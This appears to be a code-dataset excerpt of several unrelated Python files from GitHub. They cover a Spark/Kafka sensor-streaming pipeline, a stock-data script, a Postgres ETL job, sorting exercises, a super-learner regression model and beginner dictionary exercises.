metadata_header:\n annotations = metadata_header[\"annotations\"]\n else:\n annotations={}\n if \"stream_type\" in metadata_header:\n stream_type = metadata_header[\"stream_type\"]\n else:\n stream_type = \"ds\"\n\n try:\n gzip_file_content = get_gzip_file_contents(data_path + msg[\"filename\"])\n datapoints = list(map(lambda x: row_to_datapoint(x), gzip_file_content.splitlines()))\n rename_file(data_path + msg[\"filename\"])\n\n start_time = datapoints[0].start_time\n end_time = datapoints[len(datapoints) - 1].end_time\n\n return DataStream(identifier,\n owner,\n name,\n data_descriptor,\n execution_context,\n annotations,\n stream_type,\n start_time,\n end_time,\n datapoints)\n except Exception as e:\n error_log = \"In Kafka preprocessor - Error in processing file: \" + str(msg[\"filename\"])+\" Owner-ID: \"+owner + \"Stream Name: \"+name + \" - \" + str(e)\n cc_log(error_log, \"MISSING_DATA\")\n datapoints = []\n return None\n\n\ndef store_stream(data: DataStream):\n \"\"\"\n Store data into Cassandra, MySQL, and influxDB\n :param data:\n \"\"\"\n if data:\n try:\n c1 = datetime.now()\n CC.save_datastream(data,\"datastream\")\n e1 = datetime.now()\n CC.save_datastream_to_influxdb(data)\n i1 = datetime.now()\n print(\"Cassandra Time: \", e1-c1, \" Influx Time: \",i1-e1, \" Batch size: \",len(data.data))\n except:\n cc_log()\n\n\ndef kafka_file_to_json_producer(message: KafkaDStream, data_path):\n \"\"\"\n Read and convert gzip file data into a json object and publish it on Kafka\n :param message:\n \"\"\"\n records = message.map(lambda r: json.loads(r[1]))\n valid_records = records.filter(lambda rdd: verify_fields(rdd, data_path))\n results = valid_records.map(lambda rdd: file_processor(rdd, data_path)).map(\n store_stream)\n\n storeOffsetRanges(message)\n\n print(\"File Iteration count:\", results.count())\n\n#################################\ndef storeOffsetRanges(rdd):\n offsetRanges = rdd.offsetRanges()\n for offsets in offsetRanges:\n try:\n CC.store_or_update_Kafka_offset(offsets.topic, offsets.partition, offsets.fromOffset, offsets.untilOffset)\n except:\n cc_log()\n\n################################\ndef spark_kafka_consumer(kafka_topic: str, ssc, broker, consumer_group_id) -> KafkaDStream:\n \"\"\"\n supports only one topic at a time\n :param kafka_topic:\n :return:\n \"\"\"\n try:\n offsets = CC.get_kafka_offsets(kafka_topic[0])\n offsets = False # when out of range, reset\n if bool(offsets):\n fromOffset = {}\n for offset in offsets:\n offset_start = offset[\"offset_start\"]\n offset_until = offset[\"offset_until\"]\n topic_partition = offset[\"topic_partition\"]\n topic = offset[\"topic\"]\n\n topicPartion = TopicAndPartition(topic,int(topic_partition))\n fromOffset[topicPartion] = int(offset_start)\n\n return KafkaUtils.createDirectStream(ssc, kafka_topic,\n {\"metadata.broker.list\": broker,\n \"group.id\": consumer_group_id},fromOffsets=fromOffset)\n else:\n offset_reset = \"largest\" # smallest OR largest\n return KafkaUtils.createDirectStream(ssc, kafka_topic,\n {\"metadata.broker.list\": broker, \"auto.offset.reset\":offset_reset,\n \"group.id\": consumer_group_id})\n except Exception as e:\n print(e)\n\n##################################\n## Virtual Sensor ##\n##################################\n## User Defined Query Start ##\n\n# Lazily instantiated global instance of SparkSession\ndef getSparkSessionInstance():\n if (\"sparkSessionSingletonInstance\" not in globals()):\n globals()[\"sparkSessionSingletonInstance\"] = SparkSession.builder.appName(\"Cerebral-Cortex\").getOrCreate()\n\n return globals()[\"sparkSessionSingletonInstance\"]\n\n\ndef verify_sid(msg: dict, sid: str, data_path: str) -> bool:\n if not isinstance(msg[\"metadata\"], dict):\n metadata_header = json.loads(msg[\"metadata\"])\n else:\n metadata_header = msg[\"metadata\"]\n\n identifier = metadata_header[\"identifier\"] # unique identifier\n\n if identifier == sid:\n return True\n return False\n\n\ndef row_to_datapoint_cus(row: str):\n ts, offset, values = row.split(', ', 2)\n # ts = int(ts) / 1000.0\n ts = int(ts)\n offset = int(offset)\n\n # if isinstance(values, tuple):\n # values = list(values)\n # else:\n # try:\n # values = json.loads(values)\n # except:\n # try:\n # values = [float(values)]\n # except:\n # try:\n # values = list(map(float, values.split(',')))\n # except:\n # values = values\n\n # tz = timezone(timedelta(milliseconds=offset))\n ts = datetime.fromtimestamp(ts)\n # return DataPoint(start_time=ts, sample=values)\n return {'time':str(ts), 'value':list(eval(values))}\n\n# first level filtering, send valid file to structured streaming folder\ndef extract_info(msg: dict, data_path: str, v_path: str):\n global cur_time\n\n if not isinstance(msg[\"metadata\"], dict):\n metadata_header = json.loads(msg[\"metadata\"])\n else:\n metadata_header = msg[\"metadata\"]\n\n try:\n filename = msg[\"filename\"]\n # sid\n identifier = metadata_header[\"identifier\"]\n dir_name = v_path+identifier+'/'\n\n #owner = \"fbf8d50c-7f1d-47aa-b958-9caeadc676bd\"#metadata_header[\"owner\"]\n #name = metadata_header[\"name\"]\n #data_descriptor = metadata_header[\"data_descriptor\"]\n #execution_context = metadata_header[\"execution_context\"]\n gzip_file_content = get_gzip_file_contents(data_path + msg[\"filename\"])\n\n datapoints = list(map(lambda x: row_to_datapoint_cus(x), gzip_file_content.splitlines()))\n #print(datapoints)\n start_time = datapoints[0][\"time\"]\n end_time = datapoints[len(datapoints) - 1][\"time\"]\n\n # in the window, add into queue\n end_time = datetime.strptime(end_time, \"%Y-%m-%d %H:%M:%S\")\n end_time = datetime.timestamp(end_time)\n\n # cur_time is user defined start time\n if end_time >= cur_time:\n # move file to virtual sensor data folder + sid\n shutil.copy(os.path.join(data_path, filename), dir_name)\n return filename\n # filelist.append(filename)\n\n return None\n # if len(filelist) != 0:\n # return [len(filelist)]\n\n #return [identifier, owner, name, data_descriptor, start_time, end_time, datapoints] #list of dictionary\n #return [0, owner, \"name\", \"data_descriptor\", start_time, end_time, datapoints]\n\n # return valid file name instead\n # return datapoints\n\n\n except Exception as e:\n # error_log = \"In Kafka preprocessor - Error in processing file: \" + str(msg[\"filename\"])+\" Owner-ID: \"+owner + \"Stream Name: \"+name + \" - \" + str(e)\n # cc_log(error_log, \"MISSING_DATA\")\n # datapoints = []\n print(e)\n return None\n\n\n########## test dynamic import ##############\n# def process(data: list):\n# # print(\"========= %s =========\" % str(time))\n# try:\n# print(\"====== In process ======\")\n# # Get the singleton instance of SparkSession\n# spark = getSparkSessionInstance()\n# data = data.collect()\n# rdd = spark.sparkContext.parallelize(data[0])\n# # test dynamic import\n# method(rdd)\n#\n# # # ====== original ===== #\n# # rowRDD = rdd.map(lambda w: Row(time=w[\"time\"], value=w[\"value\"]))\n# # df = spark.createDataFrame(rowRDD)\n# # df.show()\n# # # ====== deprecated ===== #\n# # # test = data.collect()\n# # # rdd = spark.sparkContext.parallelize(test[0])\n# # # df = rdd.toDF()\n# #\n# # ##### Example process\n# # df.select(mean(df[\"value\"][0]), mean(df[\"value\"][1]), mean(df[\"value\"][2])).show()\n# # df.select(max(df[\"value\"][0]), max(df[\"value\"][1]), max(df[\"value\"][2])).show()\n#\n# except Exception as e:\n# print(e)\n\n\ndef process_valid_file(message: KafkaDStream, data_path: str, v_path: str, sensor_id: str, interval: int):\n \"\"\"\n Read and convert gzip file data into a json object and publish it on Kafka\n :param message:\n \"\"\"\n\n # print(\"====== Processing in process_valid_file ======\")\n records = message.map(lambda r: json.loads(r[1])) # metadata & filename\n # print(records.collect())\n valid_records = records.filter(lambda rdd: verify_fields(rdd, data_path))\n # print(\"File Iteration count-valid_records:\", valid_records.count())\n\n # print(\"====== Processing in verify_sid ======\")\n valid_sensors = valid_records.filter(lambda rdd: verify_sid(rdd, sensor_id, data_path))\n # print(\"File Iteration count-valid_sensors:\", valid_sensors.count())\n # print(valid_sensors.collect())\n\n print(\"====== Processing in extract_info ======\")\n results = valid_sensors.map(lambda rdd: extract_info(rdd, data_path, v_path))\n # used to be rdd of list [identifier, owner, name, data_descriptor, start_time, end_time, datapoints]\n # now just the file within window\n print(\"Result is: \")\n print(results.collect())\n # print(\"File Iteration results:\", results.count())\n\n ################### update buffer (old)\n # global filelist\n # for f in results.collect():\n # if f is not None:\n # filelist.append(data_path+f)\n # print (\"File Length:\", len(filelist))\n ###################\n # process(results) # serialized\n\n\ndef read_udf(data_path: str, file_name: str):\n with open(data_path+file_name) as json_data:\n dt = json.load(json_data)\n sid = dt['input_id']\n osid = dt['output_id']\n time_interval = dt['interval'] # output every interval time\n startt = dt['start_time']\n endt = dt['end_time']\n process = dt['process'] # module.process\n folder = dt['folder']\n win = dt['window']\n slid_win = dt['sliding_window']\n return [sid, osid, time_interval, startt, endt, process, folder, win, slid_win]\n\n\n###### preparing RDD/df for process old method ######\ndef compute_window_check(interval: int, datapath: str, filename: str): # sensor fields number generalize\n global cur_time\n global filelist\n time.sleep(interval)\n\n with open(filename, 'w') as myfile:\n myfile.write(\"Virtual Sensor Result:\\n\") # Future work: add description\n\n while(True):\n print (\"=== Processing upon user's request ===\")\n\n for f in filelist:\n print (\"file:\", f)\n\n output = \"=== Window starting from: \"+str(datetime.fromtimestamp(cur_time))+\" with file length: \"+str(len(filelist))+\" ===\"\n\n with open(filename, 'a') as myfile:\n myfile.write(output+'\\n')\n\n print (output)\n\n # filelist is not null (has file with that window)\n if len(filelist) != 0:\n path = ','.join(filelist)\n filelist = []\n spark = getSparkSessionInstance()\n sc = spark.sparkContext\n # sc.textFile(path).map(lambda x: x.replace('(', '').replace(')','').split(', ')).toDF().show(5)\n df = sc.textFile(path).map(lambda x: [list(eval(a)) if isinstance(eval(a),tuple) else eval(a) for a in x.split(', ',2)]).toDF([\"TimeStamp\",\"Offset\",\"Value\"])\n df = df.filter(df.TimeStamp>=cur_time)\n df.show()\n\n num = df.count()\n stime = df.select(min(df[\"TimeStamp\"])).head()[0]\n etime = df.select(max(df[\"TimeStamp\"])).head()[0]\n\n with open(filename, 'a') as myfile:\n myfile.write(\">> \"+str(num)+\" Records Collected\\n\")\n myfile.write(\">> Start time is: \"+str(datetime.fromtimestamp(stime))+'\\n')\n myfile.write(\">> End time is: \"+str(datetime.fromtimestamp(etime))+'\\n')\n\n dfrdd = df.rdd.map(list)\n method(dfrdd)\n\n else:\n with open(filename, 'a') as myfile:\n myfile.write(\"Sorry. No data available\\n\")\n print (\"Sorry. No data available\")\n\n cur_time += interval\n time.sleep(interval)\n\n################## end of old method ##################\n\n# =============================================================================\n# Kafka Consumer Configs\nbatch_duration = 5 # seconds\n# sc = SparkContext(\"spark://127.0.0.1:8083\", \"Cerebral-Cortex\")\n# master_port = sys.argv[5]\n# sc = SparkContext(master_port, \"Cerebral-Cortex\")\nsc = SparkContext(appName=\"Cerebral-Cortex\")\nsc.setLogLevel(\"WARN\")\nssc = StreamingContext(sc, batch_duration)\nbroker = \"localhost:9092\" # multiple brokers can be passed as comma separated values\n\ndata_path = sys.argv[1]\nif (data_path[-1] != '/'):\n data_path += '/'\n\narchive_path = sys.argv[2]\nif (archive_path[-1] != '/'):\n archive_path += '/'\n\ngroup_id = sys.argv[4]\nconsumer_group_id = \"md2k-test\"+str(group_id)\n\nfile_name = sys.argv[3]\nvirtual_sensor = read_udf(archive_path, file_name)\n\n# supporting one sensor\nsensor_id = virtual_sensor[0]\n\n# compute window duration\ninterval = int(virtual_sensor[2])\n\n# user defined process\nudf_function = virtual_sensor[5]\n\n# start time\ncur_time = int(virtual_sensor[3])\nost = cur_time % 10\n\n# output file\nresult_file = \"../\"+virtual_sensor[1]\n\n# virtual sensor path (user specifies in input)\nprefix = \"/Users/Shengfei/Desktop/cerebralcortex/\"\nvirtual_sensor_datapath = prefix+virtual_sensor[6]+'/'\n\n# window & sliding windows\nwin = virtual_sensor[7]\nswin = virtual_sensor[8]\n\nif int(swin.split(\" \")[0]) <= ost:\n ost = ost - int(swin.split(\" \")[0])\n\nos.makedirs(os.path.dirname(virtual_sensor_datapath), exist_ok=True)\n# now supporting one sensor\nsensor_path = virtual_sensor_datapath+sensor_id+'/'\nos.makedirs(os.path.dirname(sensor_path), exist_ok=True)\n\n# Load user defined process\n# module_cus = import_module(udf_function)\nmodule_cus = imp.load_source(udf_function, \"../UDF/\"+udf_function+\".py\")\n# reload(module_cus)\nmethod = getattr(module_cus, \"process\")\n# method is now the function that could be used directly as method(testrdd)\n\nprint (\"User Query -> Compute Window:\"+str(interval)+\", From:\", sensor_id)\nprint (\"User Query -> Detailed Info:\", virtual_sensor)\n\n# compute = Thread(target=compute_window_check, args=(interval, data_path, result_file))\n# compute.start()\n\nspark = getSparkSessionInstance()\nlines = spark\\\n .readStream\\\n .format('text')\\\n .load(sensor_path)\n\ndef ttl(col):\n return list(eval(col))\n\ndef udf1(col):\n return col.split(', ', 2)\n\nsp = udf(udf1, ArrayType(StringType()))\nmyttl = udf(ttl, ArrayType(DoubleType()))\n\ndf = lines.withColumn(\"TimeStamp\", sp(lines.value).getItem(0)) \\\n .withColumn(\"Offset\", sp(lines.value).getItem(1)) \\\n .withColumn(\"col3\", sp(lines.value).getItem(2))\n\ndf = df.withColumn(\"TimeStamp\", df.TimeStamp.cast(\"long\")) \\\n .withColumn(\"Offset\", df.Offset.cast(\"long\")) \\\n .withColumn(\"col3\", myttl(df.col3)).drop(\"value\")\n\ndf = df.withColumn(\"TimeStamp\", df.TimeStamp.cast(\"timestamp\"))\n\ngp = df.withWatermark(\"TimeStamp\", \"30 seconds\")\\\n .groupBy(window(\"TimeStamp\", win, swin, str(ost)+\" seconds\"))\n\n# customized process\n# windowedCounts = df.select(mean(df.col3[0]),mean(df.col3[1]),mean(df.col3[2]))\nwindowedCounts = method(gp, df)\n\nwindowedCounts = windowedCounts.withColumn(\"start\", windowedCounts.window.start.cast(\"string\"))\\\n .withColumn(\"end\", windowedCounts.window.end.cast(\"string\")).drop(\"window\")\\\n .withColumn(\"sid\", lit(sensor_id))\n\nkafka_files_stream = spark_kafka_consumer([\"filequeue\"], ssc, broker, consumer_group_id)\nkafka_files_stream.foreachRDD(lambda rdd: process_valid_file(rdd, data_path, virtual_sensor_datapath, sensor_id, interval)) # store or create DF() process\n\n# Start running the query that prints the windowed word counts to the console\n# update result (query) every 10 seconds\nquery = windowedCounts\\\n .writeStream\\\n .outputMode('complete')\\\n .format('console')\\\n .option('truncate', 'false') \\\n .trigger(processingTime=str(interval)+\" seconds\").start()\n\nssc.start()\nssc.awaitTermination()\nquery.awaitTermination()\n# compute.join()\n\n# /* data records how many */\n# /* simple function */\n","repo_name":"UCLA-ECEM202A-2017F/VirtualSensorCode","sub_path":"CerebralCortex-KafkaStreamPreprocessor/ss_session.py","file_name":"ss_session.py","file_ext":"py","file_size_in_byte":23814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"17172161467","text":"#coding=gbk\nimport tushare\nimport os\nfrom define import *\nfrom lib import *\n\nfn = work_catalog + bank_name \nprint(' *** tushare_version: ', tushare.__version__, ' ***\\n')\n\nShareBank = read_data(fn)\n\nflag = ['goodu', 'holding', 'attention']\nseek_date = last_qtr(get_today())\nif( seek_date[4:8] == '0331' ):\n year = str(int(seek_date[0:4])-1)\n seek_date = year + '1231'\nprint('----', seek_date, '----')\ncnt = 0\nfor i in range(len(ShareBank)):\n s = ShareBank[i]\n s.raw_data.reset(s.raw_data)\n if( has_flag(s, flag) ):\n# if( True ):\n# print(i, '---', s.nmcard())\n cnt += 1\n df = s.forecast(s)\n if( df.shape[0] != 0 ):\n for j in range(df.shape[0] ):\n if( df.iloc[j]['end_date'] == seek_date ):\n print('[',i,']---forecast---', s.nmcard(), s.flag)\n print(df)\n df = s.express(s)\n if( df.shape[0] != 0 ):\n for j in range(df.shape[0] ):\n if( df.iloc[j]['end_date'] == seek_date ):\n print('[',i,']---express---', s.nmcard(), s.flag)\n print(df)\n if( i % 250 == 0 ):\n print('===', i)\nprint(cnt)\n \nprint('\\n finished')\n","repo_name":"mbao1996/ShareBank","sub_path":"attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"34166115906","text":"import os\nimport glob\nimport psycopg2\nimport pandas as pd\nfrom sql_queries import *\n\n\ndef process_song_file(cur, filepath):\n \"\"\"\n INPUT:\n cur: connection cursor to insert the data in DB.\n filepath: path/to/the/song/file.\n PROCESS:\n Process the songs files and insert data into dimension tables: artists and songs.\n \"\"\" \n # open song file\n df = pd.read_json(filepath,lines=True)\n\n for value in df.values:\n artist_id, artist_latitude, artist_location, artist_longitude, artist_name, duration, num_songs, song_id, title, year = value\n \n # insert artist record\n artist_data = [artist_id, artist_name, artist_location, artist_longitude, artist_latitude]\n cur.execute(artist_table_insert, artist_data)\n\n # insert song record\n song_data = [song_id, title, str(artist_id), year, duration]\n cur.execute(song_table_insert, song_data)\n \n\ndef process_log_file(cur, filepath):\n \"\"\"\n INPUT:\n cur: connection cursor to insert the data in DB.\n filepath: path of log files.\n PROCESS:\n Process the log files and insert data into dimension tables: time and users.\n \"\"\" \n # open log file\n df = pd.read_json(filepath,lines=True) \n\n # filter by NextSong action\n df = df[df['page']=='NextSong']\n \n\n # convert timestamp column to datetime\n t = pd.to_datetime(df['ts'], unit='ms') \n df['timestamp'] = t\n df['hour'] = t.dt.hour\n df['day'] = t.dt.day\n df['week'] = t.dt.week\n df['month'] = t.dt.month\n df['year'] = t.dt.year\n df['weekday'] = t.dt.weekday_name \n \n # insert time data records\n time_data = df[['timestamp','hour','day','week','month','year','weekday']] \n\n for i, row in time_data.iterrows():\n cur.execute(time_table_insert, list(row))\n\n # load user table\n user_df = df[['userId','firstName','lastName','gender','level']] \n\n # insert user records\n for i, row in user_df.iterrows():\n cur.execute(user_table_insert, row)\n\n # insert songplay records\n for index, row in df.iterrows():\n \n # get songid and artistid from song and artist tables\n cur.execute(song_select, (row.song, row.artist, row.length))\n results = cur.fetchone()\n \n if results:\n songid, artistid = results\n else:\n songid, artistid = None, None\n\n # insert songplay record\n songplay_data = (index,row.timestamp, row.userId, row.level, songid, artistid,\n row.sessionId, row.location, row.userAgent) \n cur.execute(songplay_table_insert, songplay_data)\n\n\ndef process_data(cur, conn, filepath, func):\n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root,'*.json'))\n for f in files :\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print('='*60)\n print('{} files found in {}'.format(num_files, filepath))\n print('='*60)\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n func(cur, datafile)\n conn.commit()\n print('{}/{} files processed.'.format(i, num_files))\n\n\ndef main():\n conn = psycopg2.connect(\"host=127.0.0.1 dbname=sparkifydb user=student password=student\")\n cur = conn.cursor()\n\n process_data(cur, conn, filepath='data/song_data', func=process_song_file)\n process_data(cur, conn, filepath='data/log_data', func=process_log_file)\n\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"huseyinelci/DE-DataModelingofSparkifySongPlay","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"38663884608","text":"\nlist1 = [4, 8, 9, -1, 10]\n# Sort using the sort() method provided by the list object\nlist1.sort()\nprint(list1)\nlist1.sort(reverse=True)\nprint(list1)\n\n# Selection sort algorithm\n# First, find the minimum value in the given list.\n# Swap that minimum with the value at the front.\n# Loop over the remaining list (excluding the first position) in the same way until it is fully sorted.\n# **Selection sort is an in-place sort, so a double loop is required.\ndef selectionSort(li):\n cnt = 0\n for i in range(len(li)-1):\n min_idx = i\n for j in range(i+1, len(li)):\n if li[min_idx] > li[j]:\n min_idx = j\n\n if min_idx != i: \n print(li[min_idx], li[i], \"are being swapped.\")\n li[i], li[min_idx] = li[min_idx], li[i]\n cnt += 1\n\n print(cnt, \"swaps were performed.\")\n return li\n\n# Bubble sort algorithm: sorts by comparing adjacent pairs of elements\n# Pro: highly reliable.\n# Con: gets slower and slower as the amount of data grows.\ndef bubble_sort(li):\n list_length = len(li) # length is 10\n for i in range(list_length-1):\n for j in range(list_length-i-1):\n # 4, 6, 1, 10\n if li[j] > li[j+1]:\n li[j], li[j+1] = li[j+1], li[j]\n #print(i, j, j+1, li)\n print(i, j, j + 1, li)\n\nif __name__ == \"__main__\":\n li = [4,6,1,10,7,-7,-100,15,30,15]\n selectionSort(li)\n print(li)\n print(\"----------------------\")\n li1 = [4, 6, 1, 10]\n bubble_sort(li1)\n print(li1)\n\n rows = 3\n cols = 15\n s = []\n\n for row in range(rows):\n s += [[0] * cols]\n print(\"s =\", s)\n\n rows = 3\n cols = 15\n s = [([0] * cols) for row in range(rows)] # list comprehension\n print(\"s =\", s)\n\n s = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10], [11, 12, 13, 14, 15]]\n # get the number of rows and columns\n rows = len(s)\n cols = len(s[0])\n for r in range(rows):\n for c in range(cols):\n print(s[r][c], end=\"\\t\")\n print()\n\n a = ['a', 'b', 'c']\n n = [1, 2, 3]\n x = [a, n]\n print(x)\n\n","repo_name":"ggSeo-code/TIL","sub_path":"220725/listsort.py","file_name":"listsort.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"2736718052","text":"# -*- coding: utf-8 -*-\n\n# import modules\nimport numpy as np\nimport pandas as pd\nimport csv\nimport pickle\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.svm import SVR\nfrom sklearn.neural_network import MLPRegressor\n\nfrom sklearn.model_selection import cross_val_predict\n\nfrom scipy.stats import uniform as sp_rand\nfrom sklearn.model_selection import RandomizedSearchCV\n\nfrom sklearn import preprocessing\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n# function for cutting the uncertainty using gmc and gv\ndef cutWithUncertainty(data,tvGmc,tvGv):\n\t# data: pandas dataframe\n\tscreenGmc = data.loc[lambda df: df.gmc > tvGmc, :]\n\tscreenGv = screenGmc.loc[lambda df: df.gv < tvGv, :]\n\treturn screenGv\n\ndef main():\n\t#============================================================================================\n\t# load data\n\tall = pd.read_csv(\"allLabelledData.csv\")\n\t# calculate the cutting values for gmc and gv\n\tgmc = all.loc[:,'gmc']\n\tgv = all.loc[:,'gv']\n\ttvGmc = np.median(gmc)\n\ttvGv = np.median(gv)\n\tGmc40 = np.percentile(gmc,40)\n\tGv50 = np.percentile(gv,50)\n\t# cut off the uncertainty\n\tcutdata = cutWithUncertainty(all,Gmc40,Gv50)\n\t# scale the training set and testing set\n\ty = cutdata.iloc[:,[6]]\n\tx = cutdata.iloc[:,[4,5,9,10,13,14,15,16,17,18,19]]\n\tX_train, X_test, y_train, y_test = train_test_split(x,y,test_size=0.3,random_state=12345)\n\tscalerX = preprocessing.StandardScaler().fit(X_train)\n\tscalery = preprocessing.StandardScaler().fit(y_train)\n\tX_train = scalerX.transform(X_train)\n\ty_train = scalery.transform(y_train)\n\tX_test = scalerX.transform(X_test)\n\ty_test = scalery.transform(y_test)\n\t#============================================================================================\n\n\t#============================================================================================\n\t# Construct the new dataset for Super Learner\n\t#============================================================================================\n\t# Linear Model\n\tlmd = LinearRegression()\n\tpredicted_lmd = cross_val_predict(lmd, X_train, y_train, cv=10, n_jobs=32, pre_dispatch='2*n_jobs')\n\t# SVR Model\n\tclf_svr = SVR(C=4000,gamma=0.5)\n\tpredicted_svr = cross_val_predict(clf_svr, X_train, y_train, cv=10, n_jobs=48, pre_dispatch='2*n_jobs')\n\t# MLP Model\n\tclf_mlp = MLPRegressor(activation=\"relu\", alpha=1e-06, hidden_layer_sizes=550)\n\tpredicted_mlp = cross_val_predict(clf_mlp, X_train, y_train, cv=10, n_jobs=48, pre_dispatch='2*n_jobs')\n\t# New dataset\n\tSLData = np.concatenate((predicted_lmd,predicted_svr,predicted_mlp,y_train.T),axis=1)\n\t# Save the New dataset\n\tstrFileName = 'SLData.csv'\n\twith open(strFileName, 'wb') as csvfile:\n\t\tnp.savetxt(csvfile,SLData, delimiter=\",\")\n\n\t#=============================================================================================\n\t# Construct Super Learner with Train set (Ridge Regression)\n\t#=============================================================================================\n\t# Randomized Search for Algorithm Tuning\n\t# prepare a uniform distribution to sample for the alpha parameter\n\tparam_grid = {'alpha': sp_rand()}\n\t# create and fit a ridge regression model, testing random alpha values\n\tSuper_Model = Ridge()\n\trsearch = RandomizedSearchCV(estimator=Super_Model, param_distributions=param_grid, n_iter=100, cv=10, n_jobs=32, pre_dispatch='2*n_jobs')\n\trsearch.fit(SLData[:,(0,1,2)], SLData[:,3])\n\tSuper_Learner_Train = rsearch.best_estimator_\n\tfilename_super_learner_train = 'Super_learner_train.pkl'\n\tpickle.dump(Super_Learner_Train, open(filename_super_learner_train, 'wb'))\n\n\t#==============================================================================================\n\t# Fit the models with all Train data\n\t#==============================================================================================\n\t# linear\n\tlmd_train = LinearRegression()\n\tlmd_train.fit(X_train, y_train)\n\t# save the model to disk\n\tfilename_Linear = 'Linear_train.pkl'\n\tpickle.dump(lmd_train, open(filename_Linear, 'wb'))\n\t# SVR\n\tclf_svr_train = SVR(C=4000,gamma=0.5)\n\tclf_svr_train.fit(X_train, y_train)\n \t# save the model to disk\n\tfilename_svr_train = 'SVR_train.pkl'\n\tpickle.dump(clf_svr_train, open(filename_svr_train, 'wb'))\n\t# MLP\n\tclf_mlp_train = MLPRegressor(activation=\"relu\", alpha=1e-06, hidden_layer_sizes=550)\n\tclf_mlp_train.fit(X_train, y_train)\n\t# save the model to disk\n\tfilename_MLP_train = 'MLP_train.pkl'\n\tpickle.dump(clf_mlp_train, open(filename_MLP_train, 'wb'))\n\n\t#==============================================================================================\n\t# Store the new super data of test\n\t#==============================================================================================\n\tlp = lmd_train.predict(X_test)\n\tsp = clf_svr_train.predict(X_test)\n\tmp = clf_mlp_train.predict(X_test)\n\t# build the base-learner prediction matrix (was named p_test_3 but used as p_test below)\n\tp_test = np.concatenate((lp.T,sp.T,mp.T),axis=1)\n\tsuper_test = Super_Learner_Train.predict(p_test)\n\ttest_all = np.concatenate((p_test,super_test.reshape(-1, 1),y_test),axis=1)\n\t# Save the New dataset\n\tstrFileName = 'test_all.csv'\n\twith open(strFileName, 'wb') as csvfile:\n\t\tnp.savetxt(csvfile,test_all, delimiter=\",\")\n\n\nif __name__ == '__main__': main()\n","repo_name":"steve-saul/SpatialModelingCode","sub_path":"Python/machine_learning/Super_Learner_analysis.py","file_name":"Super_Learner_analysis.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"72249871467","text":"#1(1): count each letter's occurrences with a dict: no separate code for adding a letter to the dict, just accumulate the number of times it appears\n# chars=['a','c','x','d','p','a','c','a','c','a']\n# ans={}\n# for i in chars:\n# if i in ans:\n# ans[i]=ans[i]+1\n# else:\n# ans[i]=1\n# print(ans)\n'''ans2={}\nfor i in chars:\n if i in ans2:\n continue\n else:\n ans2[i]=chars.count(i)\nprint(ans2)\ntest=0\na=''\nfor i in ans2.keys():\n if ans2[i]>test:\n test=ans2[i]\n a=i\nprint(test, a)'''\n#2: check an entered name; if it does not exist, add it to the list\n'''persons=[{'name':'zhangsan','age':'18'},\n{'name':'lisi','age':'20'},\n{'name':'wangwu','age':'19'},\n{'name':'herry','age':'21'}\n]\ns=input(\"Enter a name\")\nfor i in persons:\n if s in i.values():\n print(\"Name already exists\")\n break\n else:\n age=int(input(\"Enter an age\"))\n dic={};\n dic[\"name\"]=s\n dic['age']=age\n persons.append(dic)\n break\nprint(persons)'''\nstudents = [\n {'name': '张三', 'age': 18, 'score': 52, 'tel': '1388888998', 'gender': 'female'},\n {'name': '李四', 'age': 28, 'score': 89, 'tel': '1388666666', 'gender': 'male'},\n {'name': '王五', 'age': 21, 'score': 95, 'tel': '1365588889', 'gender': 'unknown'},\n {'name': 'jerry', 'age': 20, 'score': 90, 'tel': '156666789', 'gender': 'unknown'},\n {'name': 'chris', 'age': 17, 'score': 98, 'tel': '13777775523', 'gender': 'male'},\n {'name': 'jack', 'age': 23, 'score': 52, 'tel': '13999999928', 'gender': 'female'},\n {'name': 'tony', 'age': 15, 'score': 98, 'tel': '1388888888', 'gender': 'unknown'}\n]\ncount=0\nkids=0\nfor student in students:\n if student[\"score\"]<60:\n count+=1\n print(student[\"name\"]+\" failed, score is \"+str(student[\"score\"]))\nfor student in students:\n if student[\"age\"]<18: # minors are under 18 (the original compared with >18)\n kids+=1\nprint(\"Number of minors is \"+str(kids)+\" \")\nfor student in students:\n if student[\"tel\"].endswith('8'):\n print(student[\"name\"]+\"'s phone number ends in 8\")\nmax_score=0\nmaxName=\" \"\nfor student in students:\n if student[\"score\"]>max_score:\n max_score=student[\"score\"]\n maxName=student['name']\nprint(\"The best student is \"+maxName+\" with score \"+str(max_score))\n# removing items while iterating skips elements; filter instead\nstudents=[student for student in students if student['gender'] != 'unknown']\nfor student in students:\n print(student,end=\"\\n\")","repo_name":"zykgithub1/pythonClass","sub_path":"pyCharm/test_3_19.py","file_name":"test_3_19.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
